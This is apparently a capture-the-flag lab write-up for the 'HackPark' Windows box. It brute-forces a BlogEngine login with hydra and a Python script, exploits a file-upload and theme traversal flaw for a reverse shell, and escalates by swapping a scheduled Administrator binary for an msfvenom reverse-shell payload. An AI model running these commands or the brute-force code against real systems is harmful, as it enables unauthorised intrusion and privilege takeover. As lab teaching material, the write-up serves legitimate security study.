Hack Park
BlogEngine Authenticated Exploitation - Abnormal WindowsScheduler Service PrivEsc
Starting off with an nmap scan:
$ nmap -sV -sC -A 10.10.79.198
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 07:26 CEST
Nmap scan report for 10.10.79.198
Host is up (0.047s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2020-05-17T05:28:08+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2020-05-16T05:23:21
|_Not valid after: 2020-11-15T05:23:21
|_ssl-date: 2020-05-17T05:28:09+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.79 seconds
Nmap shows only two open ports: IIS 8.5 on 80 and RDP on 3389. The web server is the obvious starting point, and robots.txt already discloses /Account/, /search and /archive.
Directory brute-forcing the web server gives us a lot of hidden directories.
The /admin directory is the entry point: it leads to a login page for BlogEngine, the blogging platform behind the site.
Searching for public exploits for BlogEngine turns up only authenticated vulnerabilities, so we need valid credentials first.
With no other way in, we brute-force the login form with hydra, assuming admin as the username and a list of common passwords. The __VIEWSTATE and __EVENTVALIDATION values in the command are copied from a captured login request on this target; they belong to the form, not to the credentials, so hydra can reuse one pair for every attempt. The failure marker is the string "Login Failed" that the page returns on a bad password.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.79.198 http-post-form "/Account/login.aspx:__VIEWSTATE=X%2Fz3Mlty62z5Y8aCAMiDaFe%2B9SKdcf9226N9xQ01mq8rP30ZJRq5G7EwUwzkz3n9rzEXVYmhE%2BBRVjtKpusOG%2BclmdkWeaN46I%2FnUYO4uzqLV1jka6wmsfIKFhEdwy3oeh7DlUj8VUnfKjmAAhl6QNzNfhdXj13D13LFPh9wtvnHyBjYmqMzxEvWAL1mwoNVWxVTCra5DFu1l1gLSNfWkrXLzo7bQdYCnhV2xxpLa1JgaLGsxDUS3h25czmU7g3MCciYGEAgFFxv%2FATyhDiIQBlHJ154WMYnL52cM7MR81pZZNgK32WdRwy%2FvA2wQvi6YrjkLrEZsiepbdoKvQHZ6qqyPxH0j6K9BI3%2FlKKiT2cfS1Nm&__EVENTVALIDATION=tbMSuN0fZZiffwoWR2502NvWLKSDwmGhtVGh9KB%2FIf6hdNVf9UjamY4uMbjjKFAInyLeK%2Fz5%2ByO1yrvO44pVUZTCisUdcMS2k59fRgxCJ9mU9waI%2BiHVLyhzWS22LViSMdGRUhHURt84Cg9MNCxXY172nJrVA5WtJ7PavxhpRlqV8Wi3&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -t 64
[80][http-post-form] host: 10.10.79.198 login: admin password: 1qaz2wsx
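The same attack in Python, as an added example that is not part of the original write-up. It differs from the hydra one-liner in one practical way: it fetches a fresh __VIEWSTATE / __EVENTVALIDATION pair from the login page before every attempt, so it keeps working on ASP.NET forms that reject a stale pair. The form field names and the "Login Failed" marker come from the hydra command above; the base URL, the wordlist path and the small login page embedded for the offline check are constructed assumptions.

```python
"""Brute-force helper for the BlogEngine /Account/login.aspx form (added example)."""
import re
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

# Field names taken from the hydra command; the failure marker is the page's own text.
FIELD_USER = "ctl00$MainContent$LoginUser$UserName"
FIELD_PASS = "ctl00$MainContent$LoginUser$Password"
FIELD_BTN = "ctl00$MainContent$LoginUser$LoginButton"
FAIL_MARKER = "Login Failed"

# ASP.NET emits <input type="hidden" name="__VIEWSTATE" id="..." value="..." />;
# match the name and value inside one tag whatever other attributes sit between them.
_HIDDEN_RE = re.compile(
    r'<input[^>]*?\bname="(__VIEWSTATEGENERATOR|__VIEWSTATE|__EVENTVALIDATION)"'
    r'[^>]*?\bvalue="([^"]*)"',
    re.IGNORECASE,
)


def extract_form_tokens(html: str) -> dict:
    """Pull the ASP.NET hidden fields out of a fetched login page."""
    return {name: value for name, value in _HIDDEN_RE.findall(html)}


def build_login_body(tokens: dict, username: str, password: str) -> dict:
    """Assemble the POST body that the hydra command hand-encodes."""
    body = dict(tokens)
    body[FIELD_USER] = username
    body[FIELD_PASS] = password
    body[FIELD_BTN] = "Log in"
    return body


def login_succeeded(response_html: str) -> bool:
    """A bad password re-renders the form with 'Login Failed'; anything else is success."""
    return FAIL_MARKER not in response_html


def try_password(base_url: str, username: str, password: str, opener=None) -> bool:
    """GET the form for fresh tokens, then POST one credential pair (network; not run offline)."""
    opener = opener or urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()))
    login_url = base_url.rstrip("/") + "/Account/login.aspx"
    page = opener.open(login_url, timeout=10).read().decode("utf-8", "replace")
    tokens = extract_form_tokens(page)
    data = urllib.parse.urlencode(build_login_body(tokens, username, password)).encode()
    resp = opener.open(login_url, data=data, timeout=10).read().decode("utf-8", "replace")
    return login_succeeded(resp)


def brute_force(base_url: str, username: str, wordlist_path: str):
    """Return the first password that logs in, or None. rockyou.txt is not UTF-8 clean."""
    with open(wordlist_path, encoding="latin-1", errors="ignore") as fh:
        for line in fh:
            candidate = line.rstrip("\n")
            if candidate and try_password(base_url, username, candidate):
                return candidate
    return None


# Constructed stand-in for the real login page, used to exercise the parser offline.
SAMPLE_LOGIN_PAGE = """<form method="post" action="./login.aspx" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="AAAA" />
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="GEN1" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="BBBB" />
</form>"""

if __name__ == "__main__":
    # Assumed target and wordlist; replace with the real values before running.
    found = brute_force("http://10.10.79.198", "admin", "/usr/share/wordlists/rockyou.txt")
    print("password:", found)
```

Because the tokens are re-read per request, this is slower than hydra with `-t 64`; the gain is correctness against forms whose tokens are bound to a session, which hydra's fixed POST body cannot handle.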
Now that we have the password, log in at /admin with the credentials hydra recovered and turn to the authenticated exploit.
The exploit only needs our IP and port filled in. Save it as PostView.ascx and upload it through the file-upload function of the post editor at
/admin/app/editor/editpost.cshtml
Uploads land in App_Data/files. To trigger it, use the directory traversal in the theme parameter, which makes BlogEngine load our PostView.ascx instead of the theme's own control:
?theme=../../App_Data/files
Start the listener before requesting the page; when the control is rendered it connects back and we have a shell. It runs as the IIS application-pool identity (IIS APPPOOL\Blog, as the process list below confirms), not as an administrator.
Privilege Escalation
Let's use msfvenom to generate a reverse-shell payload and catch it with a Metasploit handler (exploit/multi/handler on port 2345); a meterpreter session is far more stable than the current web shell for the escalation work. Upload revshell.exe with the shell we already have (it ends up in C:\Windows\Temp in the process list below) and run it.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.**.** LPORT=2345 -f exe -o revshell.exe
A little enumeration from the meterpreter session:
meterpreter > sysinfo
Computer : HACKPARK
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
360 676 svchost.exe
376 4 smss.exe
528 520 csrss.exe
580 572 csrss.exe
592 520 wininit.exe
616 572 winlogon.exe
676 592 services.exe
684 592 lsass.exe
744 676 svchost.exe
788 676 svchost.exe
820 2552 cmd.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\cmd.exe
864 676 svchost.exe
884 616 dwm.exe
916 676 svchost.exe
944 676 svchost.exe
988 676 svchost.exe
1128 676 spoolsv.exe
1176 676 amazon-ssm-agent.exe
1244 676 svchost.exe
1268 676 LiteAgent.exe
1312 676 svchost.exe
1328 676 svchost.exe
1368 676 WService.exe
1476 676 msdtc.exe
1552 676 wlms.exe
1560 1368 WScheduler.exe
1576 676 Ec2Config.exe
1848 676 sppsvc.exe
2008 676 svchost.exe
2044 676 vds.exe
2316 744 WmiPrvSE.exe
2360 820 conhost.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\conhost.exe
2464 2144 WScheduler.exe
2536 916 taskhostex.exe
2552 1328 w3wp.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\inetsrv\w3wp.exe
2608 2600 explorer.exe
2940 820 revshell.exe x86 0 IIS APPPOOL\Blog c:\Windows\Temp\revshell.exe
3060 744 SppExtComObj.Exe
3068 2584 ServerManager.exe
meterpreter > cd "c:\program files (x86)"
meterpreter > ls
Listing: c:\program files (x86)
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-08-22 15:36:16 +0200 Common Files
40777/rwxrwxrwx 4096 dir 2013-08-22 17:39:30 +0200 Internet Explorer
40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Microsoft.NET
40777/rwxrwxrwx 8192 dir 2019-08-04 13:36:42 +0200 SystemScheduler
40777/rwxrwxrwx 0 dir 2019-08-06 23:12:04 +0200 Uninstall Information
40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Windows Mail
40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Windows NT
40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 WindowsPowerShell
100666/rw-rw-rw- 174 fil 2013-08-22 17:39:32 +0200 desktop.ini
meterpreter > cd SystemScheduler
meterpreter > ls
Listing: c:\program files (x86)\SystemScheduler
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2019-08-04 13:36:53 +0200 Events
100666/rw-rw-rw- 60 fil 2019-08-04 13:36:42 +0200 Forum.url
100666/rw-rw-rw- 9813 fil 2019-08-04 13:36:42 +0200 License.txt
100666/rw-rw-rw- 871 fil 2019-08-04 13:37:02 +0200 LogFile.txt
100666/rw-rw-rw- 2805 fil 2019-08-04 13:36:53 +0200 LogfileAdvanced.txt
100777/rwxrwxrwx 536992 fil 2019-08-04 13:36:42 +0200 Message.exe
100777/rwxrwxrwx 445344 fil 2019-08-04 13:36:42 +0200 PlaySound.exe
100777/rwxrwxrwx 27040 fil 2019-08-04 13:36:42 +0200 PlayWAV.exe
100666/rw-rw-rw- 149 fil 2019-08-04 13:36:53 +0200 Preferences.ini
100777/rwxrwxrwx 485792 fil 2019-08-04 13:36:42 +0200 Privilege.exe
100666/rw-rw-rw- 10100 fil 2019-08-04 13:36:42 +0200 ReadMe.txt
100777/rwxrwxrwx 112544 fil 2019-08-04 13:36:42 +0200 RunNow.exe
100777/rwxrwxrwx 235936 fil 2019-08-04 13:36:42 +0200 SSAdmin.exe
100777/rwxrwxrwx 731552 fil 2019-08-04 13:36:42 +0200 SSCmd.exe
100777/rwxrwxrwx 456608 fil 2019-08-04 13:36:42 +0200 SSMail.exe
100777/rwxrwxrwx 1633696 fil 2019-08-04 13:36:42 +0200 Scheduler.exe
100777/rwxrwxrwx 491936 fil 2019-08-04 13:36:42 +0200 SendKeysHelper.exe
100777/rwxrwxrwx 437664 fil 2019-08-04 13:36:42 +0200 ShowXY.exe
100777/rwxrwxrwx 439712 fil 2019-08-04 13:36:42 +0200 ShutdownGUI.exe
100666/rw-rw-rw- 785042 fil 2019-08-04 13:36:42 +0200 WSCHEDULER.CHM
100666/rw-rw-rw- 703081 fil 2019-08-04 13:36:42 +0200 WSCHEDULER.HLP
100777/rwxrwxrwx 136096 fil 2019-08-04 13:36:42 +0200 WSCtrl.exe
100777/rwxrwxrwx 68512 fil 2019-08-04 13:36:42 +0200 WSLogon.exe
100666/rw-rw-rw- 33184 fil 2019-08-04 13:36:42 +0200 WSProc.dll
100666/rw-rw-rw- 2026 fil 2019-08-04 13:36:42 +0200 WScheduler.cnt
100777/rwxrwxrwx 331168 fil 2019-08-04 13:36:42 +0200 WScheduler.exe
100777/rwxrwxrwx 98720 fil 2019-08-04 13:36:42 +0200 WService.exe
100666/rw-rw-rw- 54 fil 2019-08-04 13:36:42 +0200 Website.url
100777/rwxrwxrwx 76704 fil 2019-08-04 13:36:42 +0200 WhoAmI.exe
100666/rw-rw-rw- 1150 fil 2019-08-04 13:36:42 +0200 alarmclock.ico
100666/rw-rw-rw- 766 fil 2019-08-04 13:36:42 +0200 clock.ico
100666/rw-rw-rw- 80856 fil 2019-08-04 13:36:42 +0200 ding.wav
100666/rw-rw-rw- 1637972 fil 2019-08-04 13:36:42 +0200 libeay32.dll
100777/rwxrwxrwx 40352 fil 2019-08-04 13:36:42 +0200 sc32.exe
100666/rw-rw-rw- 766 fil 2019-08-04 13:36:42 +0200 schedule.ico
100666/rw-rw-rw- 355446 fil 2019-08-04 13:36:42 +0200 ssleay32.dll
100666/rw-rw-rw- 6999 fil 2019-08-04 13:36:42 +0200 unins000.dat
100777/rwxrwxrwx 722597 fil 2019-08-04 13:36:42 +0200 unins000.exe
100666/rw-rw-rw- 6574 fil 2019-08-04 13:36:42 +0200 whiteclock.ico
meterpreter > cd events
meterpreter > ls
Listing: c:\program files (x86)\SystemScheduler\events
======================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1927 fil 2019-08-05 00:05:19 +0200 20198415519.INI
100666/rw-rw-rw- 18175 fil 2019-08-05 00:06:01 +0200 20198415519.INI_LOG.txt
100666/rw-rw-rw- 186 fil 2020-05-17 15:38:43 +0200 Administrator.flg
100666/rw-rw-rw- 182 fil 2020-05-17 15:38:18 +0200 SYSTEM_svc.flg
100666/rw-rw-rw- 0 fil 2020-05-17 15:38:43 +0200 Scheduler.flg
100666/rw-rw-rw- 449 fil 2019-08-04 13:36:53 +0200 SessionInfo.flg
100666/rw-rw-rw- 0 fil 2020-05-17 15:38:18 +0200 service.flg
meterpreter > cat 20198415519.INI_LOG.txt
08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)
08/04/19 15:11:00,Event Started Ok, (Administrator)
08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator)
08/04/19 15:12:00,Event Started Ok, (Administrator)
08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator)
08/04/19 15:13:00,Event Started Ok, (Administrator)
08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)
From the WindowsScheduler log we see that an event fires every minute ("Event Started Ok" at 15:06:01, 15:07:00, 15:08:00 and so on) and runs Message.exe as Administrator; each run ends roughly 30 seconds later, which is the lifetime of the process, not the schedule interval. The one SYSTEM_svc line shows the service itself also tries the event, but without an interactive session it only logs a complaint.
A privileged account executing a binary that sits in a directory the IIS account can write to is the same situation as a root cron job pointing at a user-writable script on Linux: we can replace Message.exe with our reverse shell and it will be launched as Administrator on the next tick.
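The reasoning above can be done mechanically, which matters on a box with many scheduler logs. The following is an added example, not part of the original write-up: it parses WindowsScheduler *_LOG.txt lines, works out the real period (gap between consecutive "Event Started Ok" lines), the run time (start to "Process Ended"), which account ran each executable, and lists executables run by a privileged account as hijack candidates. The embedded sample is the log excerpt shown above; the "privileged" account names are an assumption.

```python
"""Triage a WindowsScheduler event log for binaries run by privileged accounts (added example)."""
import re
from datetime import datetime
from statistics import median

# Log excerpt copied from the 20198415519.INI_LOG.txt output shown in the write-up.
SAMPLE_LOG = """08/04/19 15:06:01,Event Started Ok, (Administrator)
08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator)
08/04/19 15:07:00,Event Started Ok, (Administrator)
08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator)
08/04/19 15:08:00,Event Started Ok, (Administrator)
08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator)
08/04/19 15:09:00,Event Started Ok, (Administrator)
08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator)
08/04/19 15:10:00,Event Started Ok, (Administrator)
08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator)
08/04/19 15:11:00,Event Started Ok, (Administrator)
08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator)
08/04/19 15:12:00,Event Started Ok, (Administrator)
08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator)
08/04/19 15:13:00,Event Started Ok, (Administrator)
08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator)
08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)*
08/04/19 16:44:01,Event Started Ok, (Administrator)
08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator)
08/04/19 16:45:00,Event Started Ok, (Administrator)
08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator)
08/04/19 16:46:00,Event Started Ok, (Administrator)
08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator)
08/04/19 16:47:00,Event Started Ok, (Administrator)
"""

TS_FMT = "%m/%d/%y %H:%M:%S"
STARTED_RE = re.compile(r"^(?P<ts>[\d/]+ [\d:]+),Event Started Ok,[^()]*\((?P<user>[^)]+)\)")
ENDED_RE = re.compile(r"^(?P<ts>[\d/]+ [\d:]+),Process Ended\. PID:(?P<pid>\d+),"
                      r"ExitCode:(?P<code>-?\d+),(?P<exe>\S+) \((?P<user>[^)]+)\)")


def parse_log(text: str) -> list:
    """Turn log lines into dicts with kind, ts, user and (for process-end lines) exe, pid, code."""
    events = []
    for line in text.splitlines():
        m = STARTED_RE.match(line)
        if m:
            events.append({"kind": "started", "ts": datetime.strptime(m["ts"], TS_FMT),
                           "user": m["user"]})
            continue
        m = ENDED_RE.match(line)
        if m:
            events.append({"kind": "ended", "ts": datetime.strptime(m["ts"], TS_FMT),
                           "user": m["user"], "exe": m["exe"],
                           "pid": int(m["pid"]), "code": int(m["code"])})
    return events


def median_start_interval(events: list, user: str):
    """Median seconds between consecutive starts for one account: the schedule period."""
    starts = [e["ts"] for e in events if e["kind"] == "started" and e["user"] == user]
    gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
    return median(gaps) if gaps else None


def summarise(events: list) -> dict:
    """Per executable: accounts that ran it, run count, median run time (start to end)."""
    out = {}
    pending = {}  # account -> timestamp of its most recent unmatched start
    for e in events:
        if e["kind"] == "started":
            pending[e["user"]] = e["ts"]
            continue
        rec = out.setdefault(e["exe"], {"users": set(), "runs": 0, "durations": []})
        rec["users"].add(e["user"])
        rec["runs"] += 1
        start = pending.pop(e["user"], None)
        if start is not None:
            rec["durations"].append((e["ts"] - start).total_seconds())
    for rec in out.values():
        rec["median_duration_s"] = median(rec["durations"]) if rec["durations"] else None
    return out


def find_hijack_candidates(summary: dict, privileged=("Administrator", "SYSTEM")) -> list:
    """Executables a privileged account runs on a schedule; overwrite targets if writable."""
    return sorted(exe for exe, rec in summary.items() if rec["users"] & set(privileged))


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("period (s):", median_start_interval(evs, "Administrator"))
    for exe, rec in summarise(evs).items():
        print(exe, sorted(rec["users"]), rec["runs"], "runs, median", rec["median_duration_s"], "s")
    print("candidates:", find_hijack_candidates(summarise(evs)))
```

On the sample the period comes out at 60 seconds and the median run time at 33 seconds, which is exactly the distinction the log reading above turns on: the "30 seconds" is how long Message.exe lives, while the hijack window arrives once a minute.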
Time to replace C:\Program Files (x86)\SystemScheduler\Message.exe with a reverse shell. One caveat on the listings above: meterpreter's ls reports 100777 on every file and 40777 on every directory, and those modes are synthesised rather than read from the NTFS ACL, so if the overwrite fails, check the real permissions with icacls from a shell. Generate a new payload named Message.exe, this time calling back to a different port so the first session stays up:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.**.** LPORT=3456 -f exe -o Message.exe
Rename the original out of the way (Windows lets you rename a running executable but not overwrite it), upload ours in its place, start a handler on port 3456 and wait for the next scheduled run, at most a minute away. The new session arrives as Administrator, because that is the account the scheduler runs Message.exe under.